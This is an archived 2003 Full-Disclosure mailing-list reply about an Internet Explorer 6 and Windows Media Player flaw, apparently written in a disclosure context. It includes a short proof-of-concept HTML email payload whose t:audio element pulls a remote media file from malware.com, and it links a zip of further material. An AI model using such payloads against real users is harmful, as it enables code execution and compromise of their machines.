Re: [Full-Disclosure] Internet explorer 6 on windows XP allows exection of arbitrary code
http-equiv_at_excite.com
Date: 09/12/03
- Previous message: Rainer Gerhards: "RE: AW: [Full-Disclosure] RE: Computer Sabotage by Microsoft"
- Maybe in reply to: jelmer: "[Full-Disclosure] Internet explorer 6 on windows XP allows exection of arbitrary code"
- Next in thread: Richard M. Smith: "RE: [Full-Disclosure] Internet explorer 6 on windows XP allows exection of arbitrary code"
- Reply: Richard M. Smith: "RE: [Full-Disclosure] Internet explorer 6 on windows XP allows exection of arbitrary code"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: <full-disclosure@lists.netsys.com> Date: Fri, 12 Sep 2003 15:55:50 -0000
<!--
when viewing mail in recent versions of outlook it operates in the
restricted zone ,eg no active scripting allowed to run, so these wont
be exploitable unless someone proofs otherwise that is ;)
-->
<html xmlns:t>
<head><style>
t\:*{behavior:url(#default#time);display:none}</style></head><body>
<t:audio t:src="http://www.malware.com/freek.asf" />
</body></html>
Trivial inline url flip in the restricted zone. WMP 8 and under.
Unpatched since May 2003 should do the trick:
http://www.malware.com/but.its.free.zip
-- http://www.malware.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
- Previous message: Rainer Gerhards: "RE: AW: [Full-Disclosure] RE: Computer Sabotage by Microsoft"
- Maybe in reply to: jelmer: "[Full-Disclosure] Internet explorer 6 on windows XP allows exection of arbitrary code"
- Next in thread: Richard M. Smith: "RE: [Full-Disclosure] Internet explorer 6 on windows XP allows exection of arbitrary code"
- Reply: Richard M. Smith: "RE: [Full-Disclosure] Internet explorer 6 on windows XP allows exection of arbitrary code"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
